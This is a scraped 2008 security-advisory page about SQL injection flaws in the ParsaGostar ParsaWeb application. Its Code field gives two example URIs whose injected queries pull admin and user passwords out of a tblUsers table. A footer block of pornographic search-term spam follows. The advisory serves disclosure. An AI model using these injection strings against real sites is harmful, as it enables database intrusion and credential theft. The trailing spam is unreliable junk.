about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , ParsaGostar ParsaWeb Multiple SQL Injection Vulnerabilities


Title ParsaGostar ParsaWeb Multiple SQL Injection Vulnerabilities
Published 2008-09-28-12:00AM
Updated 2008-09-28-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  AmnPardaz Security Research & Penetration Testing Group
Vulnerable  ParsaGostar ParsaWeb 0
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs are available:http://www.example.com/?page=page&id=-164 or 1=(select top 1 user_pass from tblUsers where user_name = 'admin') http://www.example.com/?page=Search Search:AmnPardaz%') union ALL select '1',user_name+':'+user_pass,'3','4','5','6','7','8','9','10',11 from tblUsers--
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 21:35:57 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
t944t color prof porno indo xxl sexy m Www. Simra actressmum www.102030 tiffany te tamil sex tiffany te sxe_inject avizoonsex www.102030 Www.Xnxx.C Teen ages t367t http file t344t WOMENSEX www.free i Www.Sex ve xxl sexy m antifilter xxl sexy m SKS WWW.FRESEX europesex t111t t779t sania mirz Video sex Sex animal t513t t513t wwww.porno 12/3/2008 t632t t111t www.blueap lo840l Karina kap Www.divas. Applicatan t395t t743t Applicatan www.wawa12 free nude t395t vbulletin